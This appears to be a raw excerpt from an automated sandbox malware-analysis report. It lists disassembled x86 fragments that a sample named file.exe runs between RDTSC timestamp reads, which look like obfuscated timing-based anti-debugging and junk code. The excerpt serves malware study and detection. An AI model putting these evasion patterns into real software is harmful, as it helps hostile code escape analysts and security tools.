                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53700DC second address: 53700E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53700E0 second address: 5370102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c call 00007FD2884F85D5h 0x00000011 pop ecx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5370102 second address: 5370167 instructions: 0x00000000 rdtsc 0x00000002 mov al, bh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FD288CC4A6Ah 0x0000000c jmp 00007FD288CC4A75h 0x00000011 popfd 0x00000012 popad 0x00000013 xchg eax, ebx 0x00000014 jmp 00007FD288CC4A6Eh 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d movzx ecx, bx 0x00000020 pushfd 0x00000021 jmp 00007FD288CC4A79h 0x00000026 jmp 00007FD288CC4A6Bh 0x0000002b popfd 0x0000002c popad 0x0000002d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5370167 second address: 53701C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007FD2884F85CEh 0x0000000f mov ebx, dword ptr [ebp+10h] 0x00000012 jmp 00007FD2884F85D0h 0x00000017 xchg eax, esi 0x00000018 jmp 00007FD2884F85D0h 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FD2884F85CEh 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53701C8 second address: 53701DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD288CC4A6Eh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53701DA second address: 53701DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53701DE second address: 53701F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD288CC4A6Ah 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53701F3 second address: 53701F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53701F9 second address: 537021A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD288CC4A74h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 537021A second address: 5370247 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 2B612154h 0x00000008 mov ecx, edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007FD2884F85D4h 0x00000013 mov dword ptr [esp], edi 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b mov esi, edi 0x0000001d popad 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5370247 second address: 53702EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, bx 0x00000006 pushfd 0x00000007 jmp 00007FD288CC4A77h 0x0000000c or si, 2DFEh 0x00000011 jmp 00007FD288CC4A79h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a test esi, esi 0x0000001c pushad 0x0000001d pushad 0x0000001e mov dx, si 0x00000021 movzx ecx, bx 0x00000024 popad 0x00000025 pushfd 0x00000026 jmp 00007FD288CC4A6Bh 0x0000002b add si, 800Eh 0x00000030 jmp 00007FD288CC4A79h 0x00000035 popfd 0x00000036 popad 0x00000037 je 00007FD2FAD02DBDh 0x0000003d pushad 0x0000003e mov ecx, 614CD7B3h 0x00000043 mov si, 3C0Fh 0x00000047 popad 0x00000048 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000004f pushad 0x00000050 movzx ecx, bx 0x00000053 mov di, 36A0h 0x00000057 popad 0x00000058 je 00007FD2FAD02DB2h 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53702EB second address: 53702EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53702EF second address: 53702F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53702F5 second address: 5370362 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [esi+44h] 0x0000000c jmp 00007FD2884F85D6h 0x00000011 or edx, dword ptr [ebp+0Ch] 0x00000014 jmp 00007FD2884F85D0h 0x00000019 test edx, 61000000h 0x0000001f jmp 00007FD2884F85D0h 0x00000024 jne 00007FD2FA536900h 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FD2884F85CAh 0x00000033 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5370362 second address: 5370371 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD288CC4A6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5370371 second address: 53703C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test byte ptr [esi+48h], 00000001h 0x0000000d jmp 00007FD2884F85CEh 0x00000012 jne 00007FD2FA5368C7h 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushfd 0x0000001c jmp 00007FD2884F85CCh 0x00000021 sub ax, BD98h 0x00000026 jmp 00007FD2884F85CBh 0x0000002b popfd 0x0000002c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536097E second address: 5360984 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360984 second address: 5360988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360988 second address: 536099F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and esp, FFFFFFF8h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD288CC4A6Ah 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536099F second address: 53609A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53609A5 second address: 53609A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53609A9 second address: 53609D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007FD2884F85D6h 0x0000000e mov dword ptr [esp], ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FD2884F85CAh 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53609D9 second address: 53609DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53609DD second address: 53609E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53609E3 second address: 5360A0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD288CC4A6Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b movzx ecx, bx 0x0000000e mov eax, edi 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov ax, bx 0x00000018 mov edx, 1E3C8600h 0x0000001d popad 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360A0A second address: 5360A7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 334E00FBh 0x00000008 push ecx 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, esi 0x0000000e jmp 00007FD2884F85CAh 0x00000013 mov esi, dword ptr [ebp+08h] 0x00000016 jmp 00007FD2884F85D0h 0x0000001b sub ebx, ebx 0x0000001d pushad 0x0000001e mov dx, 6042h 0x00000022 pushfd 0x00000023 jmp 00007FD2884F85D3h 0x00000028 sub ch, 0000003Eh 0x0000002b jmp 00007FD2884F85D9h 0x00000030 popfd 0x00000031 popad 0x00000032 test esi, esi 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FD2884F85CDh 0x0000003b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360A7F second address: 5360AB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD288CC4A71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FD2FAD0A360h 0x0000000f jmp 00007FD288CC4A6Eh 0x00000014 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e mov esi, 056503F3h 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360C3A second address: 5360C59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+10h] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov si, 8D59h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360CB3 second address: 5360CC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD288CC4A6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360CC2 second address: 5360CC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360CC8 second address: 5360CCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5370C9F second address: 5370CA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5370CA5 second address: 5370CA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53709E6 second address: 53709EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53709EA second address: 53709F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53709F0 second address: 53709F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53709F6 second address: 53709FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E0B79 second address: 53E0B98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 1Ch 0x00000005 mov ebx, eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FD2884F85CDh 0x00000010 xchg eax, ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E0B98 second address: 53E0B9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E0B9C second address: 53E0BAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E0BAF second address: 53E0BC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD288CC4A74h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E005D second address: 53E0061 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E0061 second address: 53E0070 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD288CC4A6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E0070 second address: 53E00D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 2AE052DAh 0x00000008 push edi 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FD2884F85D3h 0x00000016 xor ecx, 2BDF052Eh 0x0000001c jmp 00007FD2884F85D9h 0x00000021 popfd 0x00000022 call 00007FD2884F85D0h 0x00000027 mov si, E9C1h 0x0000002b pop ecx 0x0000002c popad 0x0000002d pop ebp 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E00D1 second address: 53E00D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E00D5 second address: 53E00D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E00D9 second address: 53E00DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E00DF second address: 53E00E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5380014 second address: 5380028 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD288CC4A70h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5380028 second address: 538002C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538002C second address: 538006D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FD288CC4A79h 0x00000012 or si, 2BF6h 0x00000017 jmp 00007FD288CC4A71h 0x0000001c popfd 0x0000001d mov di, si 0x00000020 popad 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538006D second address: 5380089 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD2884F85D8h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5380089 second address: 538008D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538008D second address: 53800CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007FD2884F85D7h 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 mov dh, ah 0x00000015 jmp 00007FD2884F85D1h 0x0000001a popad 0x0000001b pop ebp 0x0000001c pushad 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E02F7 second address: 53E02FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E02FD second address: 53E034B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, E263h 0x00000007 pushfd 0x00000008 jmp 00007FD2884F85D8h 0x0000000d or ax, B0A8h 0x00000012 jmp 00007FD2884F85CBh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push dword ptr [ebp+0Ch] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FD2884F85D5h 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E034B second address: 53E03D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD288CC4A77h 0x00000009 sbb ax, F34Eh 0x0000000e jmp 00007FD288CC4A79h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push dword ptr [ebp+08h] 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007FD288CC4A76h 0x00000023 or esi, 5BAE82F8h 0x00000029 jmp 00007FD288CC4A6Bh 0x0000002e popfd 0x0000002f jmp 00007FD288CC4A78h 0x00000034 popad 0x00000035 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E03D0 second address: 53E03D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E03D6 second address: 53E03DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E03DA second address: 53E040F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 9DC6C9E1h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FD2884F85D9h 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E040F second address: 53E0413 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E0413 second address: 53E0419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E045F second address: 53E0465 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E0465 second address: 53E0469 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5BBA4 second address: D5BBAE instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD288CC4A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 539046F second address: 539048C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 539048C second address: 539050C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD288CC4A77h 0x00000008 call 00007FD288CC4A78h 0x0000000d pop esi 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push esi 0x00000012 jmp 00007FD288CC4A6Eh 0x00000017 mov dword ptr [esp], ebp 0x0000001a jmp 00007FD288CC4A70h 0x0000001f mov ebp, esp 0x00000021 jmp 00007FD288CC4A70h 0x00000026 push FFFFFFFEh 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b call 00007FD288CC4A6Dh 0x00000030 pop eax 0x00000031 mov esi, ebx 0x00000033 popad 0x00000034 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 539050C second address: 5390587 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD2884F85D8h 0x00000008 call 00007FD2884F85D2h 0x0000000d pop esi 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push 22A48DA0h 0x00000016 jmp 00007FD2884F85CEh 0x0000001b xor dword ptr [esp], 55E54DB8h 0x00000022 jmp 00007FD2884F85D0h 0x00000027 call 00007FD2884F85C9h 0x0000002c jmp 00007FD2884F85D0h 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390587 second address: 539058B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 539058B second address: 5390591 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390591 second address: 5390597 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390597 second address: 539059B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 539059B second address: 539059F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 539059F second address: 53905BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007FD2884F85CCh 0x00000011 mov eax, dword ptr [eax] 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 mov ch, bl 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53905BE second address: 539068E instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD288CC4A78h 0x00000008 sbb cx, DC08h 0x0000000d jmp 00007FD288CC4A6Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007FD288CC4A78h 0x0000001b and esi, 46F7FE68h 0x00000021 jmp 00007FD288CC4A6Bh 0x00000026 popfd 0x00000027 popad 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c pushad 0x0000002d call 00007FD288CC4A6Fh 0x00000032 mov ah, 9Bh 0x00000034 pop edi 0x00000035 mov ax, 0561h 0x00000039 popad 0x0000003a pop eax 0x0000003b pushad 0x0000003c mov ah, FFh 0x0000003e pushfd 0x0000003f jmp 00007FD288CC4A6Fh 0x00000044 jmp 00007FD288CC4A73h 0x00000049 popfd 0x0000004a popad 0x0000004b mov eax, dword ptr fs:[00000000h] 0x00000051 pushad 0x00000052 jmp 00007FD288CC4A74h 0x00000057 mov si, 7B21h 0x0000005b popad 0x0000005c nop 0x0000005d pushad 0x0000005e mov esi, 11066D59h 0x00000063 push eax 0x00000064 push ebx 0x00000065 pop eax 0x00000066 pop ebx 0x00000067 popad 0x00000068 push eax 0x00000069 pushad 0x0000006a pushad 0x0000006b push eax 0x0000006c push edx 0x0000006d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 539068E second address: 53906A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov si, dx 0x00000007 popad 0x00000008 pushad 0x00000009 mov bh, 44h 0x0000000b mov di, ax 0x0000000e popad 0x0000000f popad 0x00000010 nop 0x00000011 pushad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53906A3 second address: 53906D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FD288CC4A70h 0x00000009 pop eax 0x0000000a popad 0x0000000b movsx ebx, cx 0x0000000e popad 0x0000000f sub esp, 1Ch 0x00000012 jmp 00007FD288CC4A6Ah 0x00000017 xchg eax, ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53906D1 second address: 53906D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53906D5 second address: 53906DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53906DB second address: 5390703 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b movsx edx, ax 0x0000000e mov dx, cx 0x00000011 popad 0x00000012 xchg eax, ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
